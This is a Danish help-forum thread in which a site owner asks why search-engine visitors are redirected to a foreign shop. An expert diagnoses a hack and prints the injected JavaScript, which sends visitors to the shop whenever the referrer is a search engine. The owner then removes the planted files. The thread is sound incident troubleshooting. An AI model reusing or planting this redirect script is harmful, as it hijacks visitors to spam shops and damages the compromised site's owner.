Avatar billede voneinem Nybegynder
07. januar 2015 - 22:11 Der er 7 kommentarer

Mystisk omdirigering

Har følgende domæne "voneinem.dk" søger man f.eks på "voneinem.dk" i google såvel som i bing kommer vi op øverst - ikke noget mystisk hermed. Men klikker man på linket bliver man omdirigering til følgende site som vi intet har noget at gøre med: "monclerjapanonlineshop.com/#www.voneinem.dk"

Skriver man "voneinem.dk" direkte i browseren kommer man fint ind på vores site uden omdirigering

Derfor troede vi det var en index fejl i google, men har netop set det sammen er gældende i bing.

Kan simpel ikke finde ud af, hvordan dette kan ske og hvordan vi får det løst.

Håber nogle kan guide os på rette spor
Avatar billede jakobdo Ekspert
07. januar 2015 - 22:17 #1
Er dette din google-site-verification kode?

<meta content="UBi7zkBEaVg7qDJA9A5DLN9Oq4zyZX-KB8TyBO9fJj4" name="google-site-verification" />

Hvornår er din default.asp sidst redigeret?
Avatar billede jakobdo Ekspert
07. januar 2015 - 22:19 #2
Jeg tror i hvert fald din side er hacket.

Hvis du åbner denne side i chrome:

view-source:http://www.voneinem.dk/

Vil du se:

<script>
var regexp=/\.(aol|google|youdao|yahoo|bing|ask|biso|gougou|ifeng|ivc|sooule|niuhu|biso|Clusty|Dogpile|Answers|USA)(\.[a-z0-9\-]+){1,2}\//ig;
var where =document.referrer;
if(regexp.test(where))
{
window.location.href="http://www.monclerjapanonlineshop.com/"
}
else{
window.location.href="http://www.voneinem.dk/default.asp"
}
</script>
Avatar billede jakobdo Ekspert
07. januar 2015 - 22:19 #3
Og du får et svar.
Avatar billede voneinem Nybegynder
07. januar 2015 - 23:20 #4
Hej

Tak for jeres hurtige svar. Fandt ud af at der er blevet tilføjet/overført en index.asp samt en main.asp. Vi har altid kun haft en default.asp. Så vi har slette index.asp samt main.asp hvorfor problemet nu er væk.
Avatar billede jakobdo Ekspert
08. januar 2015 - 06:19 #5
Men problemet er jo ikke rigtigt løst. For de filer er jo kommet på en måde. Snak med dit webhotel og spørg om de kan se noget i loggen.
Avatar billede jakobdo Ekspert
08. januar 2015 - 08:17 #6
Det jeg mener er. Du har måske et sikkerhedshul i jeres/din hjemmeside. Det skal jo gerne findes og lukkes.
Ellers kan de lave samme trick igen og igen...
Avatar billede voneinem Nybegynder
08. januar 2015 - 08:51 #7
Ja, det er nok en god ide at få lukket "hullet". Vi har ændret vores adgangskoder, men det er sandsynligvis ikke nok hermed.